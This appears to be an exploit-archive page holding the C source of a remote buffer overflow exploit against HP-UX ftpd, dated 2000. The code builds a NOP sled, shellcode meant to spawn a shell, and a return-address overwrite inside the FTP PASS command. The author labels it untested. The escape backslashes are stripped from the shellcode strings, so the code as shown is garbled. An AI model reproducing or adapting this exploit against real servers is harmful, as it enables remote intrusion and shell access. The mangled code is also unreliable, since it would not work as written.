[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : HP-UX FTPD Remote Buffer Overflow Exploit
# Published : 2000-12-01
# Author : venglin
# Previous Title : MS Windows (Jolt2.c) Denial of Service Exploit
# Next Title : HP-UX 11.00/10.20 crontab Overwrite Files Exploit
/* theoretical exploit for hpux ftpd vulnerability */
/* not tested anywhere, needs tweaking */
/* (c) 2000 by babcia padlina ltd. <venglin@freebsd.lublin.pl> */
#include <stdio.h>
#include <stdlib.h>
#define NOPS 100
#define BUFSIZE 1024
char shellcode[] = /* HP-UX shellcode */
"x34x16x05x06x96xd6x05x34x20x20x08x01xe4x20xe0x08x0b"
"x5ax02x9axe8x3fx1fxfdx08x21x02x80x34x02x01x02x08x41"
"x04x02x60x40x01x62xb4x5ax01x54x0bx39x02x99x0bx18x02"
"x98x34x16x04xbex20x20x08x01xe4x20xe0x08x96xd6x05x34"
"xdexadxcaxfex2fx62x69x6ex2fx73x68";
char nop[] = "x08x21x02x80"; /* PA-RISC NOP */
unsigned long ret = 0xdeadbeef;
int main(argc, argv)
int argc;
char **argv;
{
int stackofs;
char buf[BUFSIZ*2];
int i;
for (strcpy(buf, "PASS "),i=0;i<NOPS;i++) strcat(buf, nop);
sprintf(buf+strlen(buf), "%s%%.%dd%c%c%c%c", shellcode,
BUFSIZE-strlen(shellcode)-NOPS*4-4,
((int)ret & 0xff), (((int)ret & 0xff00) >> 8),
(((int)ret & 0xff0000) >> 16),
(((int)ret & 0xff000000) >> 24));
printf("USER ftprn%srn", buf);
exit(0);
}
// www.Syue.com [2000-12-01]